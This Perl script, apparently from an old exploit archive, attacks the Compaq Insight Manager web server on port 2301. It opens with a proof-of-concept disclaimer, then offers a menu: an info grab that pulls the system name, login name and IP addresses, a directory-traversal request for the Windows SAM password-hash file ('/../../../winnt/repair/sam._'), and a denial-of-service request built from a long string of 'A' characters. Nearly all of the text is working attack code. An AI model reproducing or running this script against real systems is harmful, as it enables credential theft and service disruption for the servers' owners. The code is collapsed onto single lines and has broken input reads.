#!/usr/bin/perl # # ---------------------------------------------------------- # Disclaimer: this file is intended as proof of concept, and # is not intended to be used for illegal purposes. I accept # no responsibility for damage incurred by the use of it. # ---------------------------------------------------------- # # -- Looks for CompaqInsightManager webserver. # # -- Changes : configurable host, port and DoS # -- Changed & updated by Gert 2000 # -- http://www.isaan.org/ # system ('cls'); use IO::Socket; print("==================================================================\n"); print("======= CompaqInsightManager WEBserver info / check / DoS ========\n"); print("======= Code by Gert Fokkema 2000 http://www.isaan.org =======\n"); print("======= Beta version 0.5 Comments mailto: cim\@isaan.org ========\n"); print("==================================================================\n"); print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n"); print(">: "); $host = ; # CompaqInsightManager running on port 2301 print("Enter the port number of the host to connect e.g. 2301 : \n"); print(">: "); #$port = ; $port = 2301; print ("2301\n"); # # queryselect # # CompaqInsightManager standard query "/cpqlogin.htm?" or "index.html" sub queryselect { print("Select query to check for --1,2,3,4-- : \n"); print("1 : WEBserver INFO\n"); print("2 : WEBserver 'root dot dot vulnerability'\n"); print("3 : WEBserver DenialOfService attack\n"); print("0 : QUIT\n"); print("< : "); $query_select = ; # 0 = QUIT if($query_select == 0) { $query=""; print "Selected type : QUIT\n"; &quit; } # 1 = INFO $query="/cpqlogin.htm?" if($query_select == 1) { $query="/cpqlogin.htm?"; print "Selected type : INFO\n"; print "Selected query : '/cpqlogin.htm?'\n"; &connect; sleep(2); print("Press RETURN to continue..."); $select = ; system ('cls'); print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n"); print(">: "); print ("$host"); print("Enter the port number of the host to connect e.g. 2301 : \n"); print(">: "); print ("2301\n"); &queryselect; } # 2 = INFO $query="/../../../winnt/repair/sam._" if($query_select == 2) { $query="/../../../winnt/repair/sam._"; print "Selected type : root dot dot vulnerability\n"; print "Selected query : '/../../../winnt/repair/sam._'\n"; &connect; sleep(2); print("Press RETURN to continue..."); $select = ; system ('cls'); print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n"); print(">: "); print ("$host"); print("Enter the port number of the host to connect e.g. 2301 : \n"); print(">: "); print ("2301\n"); &queryselect; } # 3 = INFO $query="" if($query_select == 3) { $query = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; print "Selected type : DenialOfService attack\n"; print "Selected query : 'AAAAAAAAAA'\n"; &connect; sleep(2); print("Press RETURN to continue..."); $select = ; system ('cls'); print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n"); print(">: "); print ("$host"); print("Enter the port number of the host to connect e.g. 2301 : \n"); print(">: "); print ("2301\n"); &queryselect; } print("Input not valid...try again!!\n"); sleep(2); system ('cls'); print("Enter the ip-address of the host to connect e.g. 127.0.0.1 : \n"); print(">: "); print ("$host"); print("Enter the port number of the host to connect e.g. 2301 : \n"); print(">: "); print ("2301\n"); &queryselect; } &queryselect; # # connect # sub connect { print("==================================================================\n"); print("Connecting to ip-address : $host"); print("Trying connect host at port : $port\n"); print("Query to check for : $query\n"); print("==================================================================\n"); $privatename="unknown\n"; $username="unknown\n"; $privateip="unknown\n"; $publicip="unknown\n"; select STDOUT; $| = 1; select(STDOUT); $| = 1; $handle = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port, Reuse=>1) || die ">: connect failed to port $port on $host...exiting ;-(\n"; # or die "can't connect to port $port on $host: $!"; print ">: connect succesfull to port $port on $host...checking query ;-)\n"; $handle->autoflush(1); print $handle "GET $query\\ HTTP/1.0\nTranslate: f\r\n\n"; $info = ""; $count=0; while ($line = <$handle>) {$content = $content . $line; $count += 1; #} if ($count == 13) { $privatename = $line; } else{} if ($count == 36) { $username = $line; } else{} if ($count == 56) { $privateip = $line; } else{} if ($count == 57) { $publicip = $line; } else{} } close $handle; close($socket); #print "Content-type: text/plain\n\n"; #print $content; print("\n"); print(" ==========================================\n"); print " == CompaqInsightManager WEBserver Info: ==\n"; print(" ==========================================\n"); print ("System name : $privatename"); print ("Login name : $username"); print ("Private IP : $privateip"); print ("Public IP : $publicip"); print("==================================================================\n"); } sub quit { close $handle; close($socket); print("localhost: done..."); exit }